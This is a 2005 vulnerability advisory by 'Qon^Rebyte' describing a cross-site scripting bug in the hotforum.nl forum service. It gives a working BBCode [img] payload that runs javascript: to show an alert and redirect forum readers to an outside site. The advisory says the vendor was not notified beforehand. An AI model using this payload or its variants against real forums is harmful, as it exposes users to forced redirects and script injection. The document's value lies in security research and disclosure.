...::: hotforum.nl XSS exploit :::...
hotforum.nl XSS exploit
---------------------------
* 13 march 2005
* Discovered by Qon^Rebyte
..:: STATUS ::..
______________________________________________________________________
hotforum.nl has not yet been notified about this exploit
..:: VULNERABLE ::..
______________________________________________________________________
All hotforums, because it's an on line service.
Once the service is patched all hotforums will be immune.
..:: EXPLOIT ::..
______________________________________________________________________
Risk: Low/Medium
Type: Input Validation Error
What: Input JS code
Proof of Concept
----------------
Post this:
**********************************************************************
[img]javascript:alert('hotforum.nl xss exploit - by Qon^Rebyte');
location.replace('http://dhost.info/recall/rebyte/');[/img]
**********************************************************************
This will alert following message:
"hotforum.nl xss exploit - by Qon^Rebyte"
and redirect to another site:
"http://dhost.info/recall/rebyte/"
..:: CREDITS ::..
______________________________________________________________________
This bug was discovered in approx. 3 minutes time by Qon^Rebyte.
Because it's just a very plain XSS bug :)
Greetings fly out 2
---------------------
* Rebyte Security : because it rox :)
* Mr.Manson : Rebyte co-admin
* Bugtraq : for doing a great job
*** Qon ^ Rebyte ***
-- http://dhost.info/recall/rebyte/ --
---------- rebyte@xxxxxxxxx ----------